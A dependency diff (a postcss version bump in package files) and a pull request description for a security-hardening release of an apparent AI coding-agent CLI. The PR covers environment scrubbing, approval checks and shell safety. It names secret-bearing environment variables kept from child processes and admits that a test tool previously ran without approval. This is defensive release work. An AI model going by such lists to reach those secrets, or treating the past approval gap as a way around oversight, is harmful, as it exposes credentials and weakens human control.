       "os": [
@@ -5196,9 +5128,6 @@
         "x64"
       ],
       "dev": true,
-      "libc": [
-        "musl"
-      ],
       "license": "MIT",
       "optional": true,
       "os": [
@@ -10104,34 +10033,6 @@
         "sass": {
           "optional": true
         }
-      }
-    },
-    "node_modules/next/node_modules/postcss": {
-      "version": "8.4.31",
-      "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.4.31.tgz",
-      "integrity": "sha512-PS08Iboia9mts/2ygV3eLpY5ghnUcfLV/EXTOW1E2qYxJKGGBUtNjN76FYHnMs36RmARn41bC0AZmn+rR0OVpQ==",
-      "funding": [
-        {
-          "type": "opencollective",
-          "url": "https://opencollective.com/postcss/"
-        },
-        {
-          "type": "tidelift",
-          "url": "https://tidelift.com/funding/github/npm/postcss"
-        },
-        {
-          "type": "github",
-          "url": "https://github.com/sponsors/ai"
-        }
-      ],
-      "license": "MIT",
-      "dependencies": {
-        "nanoid": "^3.3.6",
-        "picocolors": "^1.0.0",
-        "source-map-js": "^1.0.2"
-      },
-      "engines": {
-        "node": "^10 || ^12 || >=14"
       }
     },
     "node_modules/node-domexception": {

--- a/web/package.json
+++ b/web/package.json
@@ -28,9 +28,12 @@
     "autoprefixer": "^10.4.20",
     "eslint": "^9.39.4",
     "eslint-config-next": "^15.5.16",
-    "postcss": "^8.5.1",
+    "postcss": "^8.5.14",
     "tailwindcss": "^3.4.17",
     "typescript": "^5.7.3",
     "wrangler": "^4.86.0"
+  },
+  "overrides": {
+    "postcss": "$postcss"
   }
 }


### PR DESCRIPTION
## Summary

v0.8.23 is a security-focused release. The bulk is the 11-commit hardening
stack from the previous session (env scrub, plan-mode tool surface, sub-agent
approvals, symlink walks, runtime API auth, shell safety, MCP config path
traversal, deps bump) plus the macOS Keychain prompt fix and the compact
live-thinking UX change.

This PR also:
- Tightens the `run_tests` approval policy (responsibly disclosed by **@47Cid**)
- Addresses **#1244** (opaque MCP stdio spawn errors + env-scrub regression for NVM/proxy users)
- Bumps versions, writes the 0.8.23 CHANGELOG, and backfills 0.8.21/0.8.22
- Adds a release checklist and a CHANGELOG-aware test gate so the v0.8.21/v0.8.22 changelog gap can't recur

## Stack on top of `origin/main` (16 commits)

```
0ffa7bf72 docs(changelog): credit security disclosure across 0.8.22 + 0.8.23
401c1f6cf fix(security): tighten approval policy for run_tests
cd78b41fa test(release): replace hardcoded version assertion with CHANGELOG gate
8e9957da5 chore(release): prepare v0.8.23
77adb1030 fix(mcp): preserve spawn error chain and pass Node/proxy env (#1244)
07410521d fix(auth): default to file-backed secret store
9e6924c74 fix(security): narrow Plan mode tool surface
9dcbc94d5 test(skills): isolate command tests from global skills
2de376647 fix(security): tighten shell safety classification
9ee3b5158 fix(security): require runtime API auth by default
6248dc050 fix(security): preserve sub-agent approval boundaries
9864f6401 fix(security): avoid following symlinked workspace walks
e6d4eae5d fix(security): scrub child process environments
838078430 fix(security): tighten paths and output handling
4de726abc feat(tui): compact live thinking by default
69862467c chore(deps): update security-sensitive dependencies
```

## Security disclosures credited

@47Cid is credited in both v0.8.22 and v0.8.23 CHANGELOG entries (neutral
language, no attack-vector detail).

## #1244: MCP stdio spawn failures

Previously the user saw an opaque `MCP stdio spawn failed (transport=stdio
server=… cmd=… args=… env_keys=[])` with no underlying reason. Two parts:

**1. Display fix** — `err.to_string()` / `{err}` only render the top of the
anyhow chain, dropping the underlying `io::Error`. Switched four sites
(`mcp.rs:1764`, `main.rs:3259`, `main.rs:3376`, `core/engine.rs:1542`) to
the `{err:#}` form so users now see "No such file or directory (os error 2)"
or similar instead of just the wrapper.

**2. Env passthrough** — the v0.8.22 `e6d4eae5d` env-scrub commit drops
`NVM_DIR`, `NODE_OPTIONS`, `NPM_CONFIG_*`, `HTTP_PROXY`, etc. for all child
spawns. That breaks `npx`/`uvx` MCP servers in NVM-shimmed and proxy-bound
environments. Added `is_allowed_mcp_env_key` / `apply_to_tokio_command_mcp`
in `child_env.rs` — strict superset of the base allowlist that adds
Node/Python/Ruby/Java/proxy/CA-bundle bootstrap vars. Switched the MCP
stdio spawn site to use it. Secret-bearing parent env (`AWS_*`,
`GITHUB_TOKEN`, `*_API_KEY`, …) stays scrubbed.

## CHANGELOG backfill for v0.8.21 and v0.8.22

The v0.8.21 and v0.8.22 release commits never updated `CHANGELOG.md`
(unintentional gap). Added entries summarizing both, with explicit
contributor credit for the v0.8.21 community-PR fixes from
**Reid (@reidliu41)**, **jiaren wang (@JiarenWang)**, **Friende
(@pengyou200902)**, **ZzzPL (@Oliver-ZPLiu)**, **Sun**, **Liu-Vince**,
**kitty**, and **Aqil Aziz**.

## Release checklist + self-updating gate

- Added `docs/RELEASE_CHECKLIST.md` codifying CHANGELOG + version + preflight
  + npm-smoke gates explicitly.
- Replaced the brittle `package_version_is_current_hotfix_release` test
  (which hardcoded `assert_eq!(env!("CARGO_PKG_VERSION"), "0.8.22")` and
  needed manual update on every release) with
  `changelog_entry_exists_for_current_package_version`, which reads
  `CHANGELOG.md` and asserts a `## [X.Y.Z]` entry exists for the current
  workspace version. No hardcoded string; gates against the actual class
  of bug.

## Known issues for v0.8.23

- **Mid-run MCP stderr is still suppressed.** Spawn-time OS errors are
  visible (the most common #1244 case), but if a child spawns then exits
  later, its stderr is dropped. Full mid-run stderr capture is planned for
  v0.8.24.

## Local preflight

- `./scripts/release/check-versions.sh` → `Version state OK: workspace=0.8.23, npm=0.8.23, lockfile in sync.`
- `cargo fmt --all -- --check` → clean
- `cargo clippy --workspace --all-targets --all-features --locked -- -D warnings` → clean
- `cargo test --workspace --all-features --locked` → 2469 passed, 0 failed (two pre-existing parallel-test flakes — `core::engine::tests::refresh_system_prompt_is_noop_when_unchanged` and `snapshot::repo::tests::open_or_init_removes_stale_tmp_pack_files_only` — surfaced once each across multiple runs; both pass in isolation; HOME-env / tmp-file races, not introduced by this stack)

## Test plan

- [ ] CI green on this PR
- [ ] Review CHANGELOG backfill for v0.8.21/v0.8.22 — confirm contributor list is correct (no false credits)
- [ ] On macOS with NVM: build this branch, add an MCP server using `npx -y @some/server`; verify it spawns
- [ ] On macOS without Node on PATH: same setup; verify spawn failure now reports `No such file or directory (os error 2)` instead of the opaque wrapper
- [ ] Manual: `deepseek` startup no longer prompts for Keychain on macOS
- [ ] Manual: invoke `run_tests` from a session with `approval_policy=on-request`; verify the approval prompt now appears (was previously silent)
- [ ] Mark Ready, merge, then tag v0.8.23 manually (do **not** auto-tag from CI)

🤖 Generated with [Claude Code](https://claude.com/claude-code)